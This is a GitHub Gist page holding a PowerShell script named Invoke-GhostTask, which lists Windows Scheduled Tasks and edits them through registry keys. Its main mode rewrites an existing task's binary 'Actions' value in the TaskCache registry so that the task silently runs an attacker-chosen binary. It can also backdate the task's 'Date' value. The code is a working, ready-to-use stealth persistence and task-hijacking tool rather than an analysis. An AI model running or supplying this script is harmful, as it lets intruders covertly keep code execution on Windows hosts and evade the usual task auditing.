-
-
Save raystyle/bf632fc2432b51aad153d1d597c34290 to your computer and use it in GitHub Desktop.
A PS1 Script intended to edit Scheduled Tasks via Registry Keys
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-GhostTask { | |
| param ( | |
| [string]$TaskName, | |
| [switch]$ShowTasks, | |
| [string]$Id, | |
| [string]$TargetTask, | |
| [string]$TargetBinary, | |
| [string]$Date, | |
| [string]$Help | |
| ) | |
| $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree" | |
| if ($TaskName) { | |
| # Use the previous code if TaskName is provided | |
| $task = Get-ChildItem -Path $registryPath -Recurse | Where-Object { $_.PSChildName -eq $TaskName } | |
| if ($task) { | |
| $taskDetails = $task | Get-ItemProperty | |
| $taskDetails | |
| } else { | |
| Write-Host "Task with name '$TaskName' not found." | |
| } | |
| } | |
| elseif ($Id) { | |
| # Use this code if Id is provided | |
| $taskDetails = Get-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\$Id" | |
| if ($taskDetails) { | |
| $taskDetails | |
| } else { | |
| Write-Host "Task with ID '$Id' not found." | |
| } | |
| } | |
| elseif ($ShowTasks) { | |
| Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree' | Get-ItemProperty |Select-Object PSChildName | |
| } | |
| elseif ($TargetTask) { | |
| # Ghost Scheduled Tasks | |
| # ASCII art printing | |
| Write-Host @" | |
| .-. | |
| (o o) boo! | |
| | O \ | |
| \ \ | |
| `~~~' | |
| "@ | |
| Write-Host "Ghosting Task >>> $TargetTask" -ForegroundColor Green | |
| Start-Sleep 1 | |
| # Find task | |
| $IDPath = Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree" -Recurse | Where-Object { $_.PSChildName -eq $TargetTask } | Get-ItemProperty | ForEach-Object { $_.Id } | |
| # Specify the registry path | |
| $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\$IDPath" | |
| # Specify the name of the registry entry | |
| $entryName = 'Actions' | |
| # Specify the string value | |
| $stringValue = $TargetBinary | |
| # Count how many characters | |
| $characterCount = $stringValue.Length * 2 | |
| # Filler Decimal Values | |
| $magicbytes1 = 3, 0, 12, 0, 0, 0, 65, 0, 117, 0, 116, 0, 104, 0, 111, 0, 114, 0, 102, 102, 0, 0, 0, 0, 'REPLACEME', 0, 0, 0 | |
| # Find and replace the value "REPLACEME" with a new value | |
| $magicbytes1 = $magicbytes1 -replace "REPLACEME", $characterCount | |
| # Empty Values | |
| $magicbytes2 = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 | |
| # Convert the string to a byte array | |
| $binaryDataFromString = [System.Text.Encoding]::Unicode.GetBytes($stringValue) | |
| # Concatenate the filler and binary data arrays | |
| $combinedBinaryData = $magicbytes1 + $binaryDataFromString + $magicbytes2 | |
| # Create the registry entry with REG_BINARY value | |
| Set-ItemProperty -Path $registryPath -Name $entryName -Type Binary -Value $combinedBinaryData | |
| # This is to set the Date if avaialable | |
| # Check if the $Date parameter is provided | |
| if ($Date) { | |
| # Convert the provided date string to a DateTime object | |
| $dateTimeValue = Get-Date $Date | |
| # Create the registry key if it doesn't exist | |
| if (-not (Test-Path $registryPath)) { | |
| New-Item -Path $registryPath -Force | |
| } | |
| # $dateTimeValue = Get-Date | |
| # Check if $dateTimeValue is not null and is a valid DateTime object | |
| if ($dateTimeValue -is [System.DateTime]) { | |
| # Format the DateTime value as "2024-01-03T10:04:03.1538464" | |
| $formattedDateTime = $dateTimeValue.ToString("yyyy-MM-ddTHH:mm:ss.fffffff")} | |
| Set-ItemProperty -Path $registryPath -Name "Date" -Value $formattedDateTime -Type String -Force | |
| } | |
| else{ | |
| # Define the total number of steps | |
| $totalSteps = 25 | |
| # Loop through each step and update the progress bar | |
| for ($i = 1; $i -le $totalSteps; $i++) { | |
| # Calculate the percentage completion | |
| $percentComplete = ($i / $totalSteps) * 100 | |
| # Update the progress bar | |
| Write-Progress -Activity "Processing" -Status "Ghosting $i of $totalSteps" -PercentComplete $percentComplete | |
| # Simulate some processing time (remove this line in a real script) | |
| Start-Sleep -Milliseconds 50 | |
| } | |
| Write-Host "Ghosted!!" -ForegroundColor Green | |
| } | |
| } | |
| elseif ($Help) { | |
| Write-Host | |
| @" | |
| Usage: | |
| Invoke-GhostTask -TaskName: Outputs information about a specific task | |
| Invoke-GhostTask -Id: {UUID} Task to gain specified information about a task | |
| Invoke-GhostTask -ShoawTask: [Output Avaialable Task] | |
| Invoke-GhostTask -TargetTask: [Task to Ghost] -TargetBinary [Binary pointing for the Task to execute] -Date [Specify a date] | |
| "@ | |
| } | |
| else { | |
| Write-Host | |
| @" | |
| Usage: | |
| Invoke-GhostTask -TaskName: Outputs information about a specific task | |
| Invoke-GhostTask -Id: {UUID} Task to gain specified information about a task | |
| Invoke-GhostTask -ShoawTask: [Output Avaialable Task] | |
| Invoke-GhostTask -TargetTask: [Task to Ghost] -TargetBinary [Binary pointing for the Task to execute] -Date [Specify a date] | |
| "@ | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment